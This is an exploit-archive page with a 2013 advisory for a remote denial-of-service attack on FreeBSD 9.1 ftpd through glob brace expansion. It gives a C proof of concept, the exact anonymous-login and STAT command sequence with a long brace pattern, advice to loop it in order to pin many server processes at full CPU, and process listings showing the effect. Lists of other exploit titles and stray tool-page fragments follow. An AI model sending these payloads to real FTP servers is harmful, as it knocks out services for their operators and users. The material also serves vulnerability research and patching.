Menu

Search for hundreds of thousands of exploits

"FreeBSD 9.1 - 'ftpd' Remote Denial of Service"

Author

Exploit author

"Maksymilian Arciemowicz"

Platform

Exploit platform

freebsd

Release date

Exploit published date

2013-02-05

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/

Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003

--- 1. Description ---
I have decided check BSD ftpd servers once again for wildcards. Old
bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last
FreeBSD version.
Attacker, what may connect anonymously to FTP server, may cause CPU
resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous',
sending 'STAT' command with special wildchar, enought to create ftpd
process with 100% CPU usage.

Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include <stdio.h>
#include <glob.h>

int main(){
		glob_t globbuf;
		char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
		glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
}
--- PoC ---

--- Exploit ---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---

Result of attack:
ftp     13034   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.96
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13035   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.89
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13036   0.0  0.4  10416   1944  ??  R    10:48PM    0:00.73
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13046   0.0  0.4  10416   1952  ??  R    10:48PM    0:00.41
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp     13047   0.0  0.4  10416   1960  ??  R    10:48PM    0:00.42
ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root    13219   0.0  0.3  10032   1424  ??  R    10:52PM    0:00.00
/usr/libexec/ftpd -dDA
root    13225   0.0  0.3  10032   1428  ??  R    10:52PM    0:00.00
/usr/libexec/ftpd -dDA
root    13409   0.0  0.3  10032   1404  ??  R    10:53PM    0:00.00
/usr/libexec/ftpd -dDA
root    13410   0.0  0.3  10032   1404  ??  R    10:53PM    0:00.00
/usr/libexec/ftpd -dDA
...

=>Sending:
STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}

=>Result:
@ps:
ftp      1336 100.0  0.5  10416   2360  ??  R    11:15PM 600:39.95
ftpd: 127.0.0.1: anonymous/anonymous@cxsecurity.com: \r\n (ftpd)$
@top:
1336 root        1 103    0 10416K  2360K RUN    600:53 100.00% ftpd

one request over 600m (~10h) execution time and 100% CPU usage. This
issue allow to create N ftpd processes with 100% CPU usage.

Just create loop while(1) and send these commands
---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---

NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2

The funniest is that freebsd use GLOB_LIMIT in ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
	if (strpbrk(whichf, "~{[*?") != NULL) {
		int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

		memset(&gl, 0, sizeof(gl));
		gl.gl_matchc = MAXGLOBARGS;
		flags |= GLOB_LIMIT;
		freeglob = 1;
		if (glob(whichf, flags, 0, &gl)) {
---

but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU
resource exhaustion. ;]

Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723

only FreeBSD and GNU glibc are affected


--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233


--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve
problem with security ;)


--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http://cxsecurity.com/cveshow/CVE-2010-2632

Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion
http://cxsecurity.com/issue/WLB-2011050004
http://cxsecurity.com/cveshow/CVE-2011-0418

More CWE-399 resource exhaustion examples:
http://cxsecurity.com/cwe/CWE-399

The regcomp implementation in the GNU C Library allows attackers to
cause a denial of service proftpd
http://cxsecurity.com/cveshow/CVE-2010-4051
http://cxsecurity.com/cveshow/CVE-2010-4052
http://www.kb.cert.org/vuls/id/912279


--- 5. Contact ---
Maksymilian Arciemowicz
max 4T cxsecurity.com
http://cxsecurity.com/
http://cxsec.org/
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-04-06 "pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting" webapps freebsd "Matthew Aberegg"
2020-02-11 "OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution" remote freebsd "Marco Ivaldi"
2019-12-30 "FreeBSD-SA-19:02.fd - Privilege Escalation" local freebsd "Karsten König"
2019-12-30 "FreeBSD-SA-19:15.mqueuefs - Privilege Escalation" local freebsd "Karsten König"
2019-07-10 "FreeBSD 12.0 - 'fd' Local Privilege Escalation" local freebsd gr4yf0x
2016-01-25 "FreeBSD SCTP ICMPv6 - Error Processing" dos freebsd ptsecurity
2015-01-29 "FreeBSD - Multiple Vulnerabilities" dos freebsd "Core Security"
2013-10-04 "FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation" local freebsd CurcolHekerLink
2013-06-26 "FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)" local freebsd Metasploit
2013-06-21 "FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation" local freebsd Hunger
Release Date Title Type Platform Author
2016-12-12 "iOS 10.1.x - Certificate File Memory Corruption" dos ios "Maksymilian Arciemowicz"
2015-12-09 "Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow" dos osx "Maksymilian Arciemowicz"
2014-04-08 "Apple Mac OSX 10.9 - Hard Link Memory Corruption" dos osx "Maksymilian Arciemowicz"
2013-02-05 "FreeBSD 9.1 - 'ftpd' Remote Denial of Service" dos freebsd "Maksymilian Arciemowicz"
2012-01-14 "PHP 5.3.8 - Multiple Vulnerabilities" dos multiple "Maksymilian Arciemowicz"
2011-11-04 "Libc - 'regcomp()' Stack Exhaustion Denial of Service" dos multiple "Maksymilian Arciemowicz"
2011-08-19 "PHP < 5.3.7 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities" dos php "Maksymilian Arciemowicz"
2011-07-01 "NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows" remote bsd "Maksymilian Arciemowicz"
2011-05-12 "Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service" dos linux "Maksymilian Arciemowicz"
2011-03-18 "PHP 5.3.5 libzip 0.9.3 - _zip_name_locate Null Pointer Dereference" dos linux "Maksymilian Arciemowicz"
2011-03-02 "vsftpd 2.3.2 - Denial of Service" dos linux "Maksymilian Arciemowicz"
2011-02-17 "PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference" dos linux "Maksymilian Arciemowicz"
2011-02-17 "PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial of Service" dos php "Maksymilian Arciemowicz"
2011-01-07 "GNU libc/regcomp(3) - Multiple Vulnerabilities" dos linux "Maksymilian Arciemowicz"
2010-12-10 "PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow" dos multiple "Maksymilian Arciemowicz"
2010-12-07 "GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service" dos linux "Maksymilian Arciemowicz"
2010-11-05 "PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference" dos php "Maksymilian Arciemowicz"
2010-10-07 "libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)" dos multiple "Maksymilian Arciemowicz"
2010-09-08 "FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition" dos bsd "Maksymilian Arciemowicz"
2010-05-27 "FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)" dos freebsd "Maksymilian Arciemowicz"
2010-05-21 "Sun Solaris 10 - 'in.ftpd' Long Command Handling Security" dos solaris "Maksymilian Arciemowicz"
2010-05-21 "Sun Solaris 10 - Nested Directory Tree Local Denial of Service" dos solaris "Maksymilian Arciemowicz"
2010-04-24 "Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)" dos osx "Maksymilian Arciemowicz"
2010-01-08 "MATLAB R2009b - 'dtoa' Implementation Memory Corruption" dos linux "Maksymilian Arciemowicz"
2010-01-08 "Apple Mac OSX 10.x - 'libc/strtod(3)' Memory Corruption" dos osx "Maksymilian Arciemowicz"
2009-12-19 "PHP 5.2.12/5.3.1 - 'symlink()' open_basedir Bypass" local php "Maksymilian Arciemowicz"
2009-12-03 "PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure" local php "Maksymilian Arciemowicz"
2009-11-20 "Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution" remote multiple "Maksymilian Arciemowicz"
2009-11-20 "KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution" remote linux "Maksymilian Arciemowicz"
2009-11-13 "PHP 5.2.11/5.3.0 - Multiple Vulnerabilities" remote php "Maksymilian Arciemowicz" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected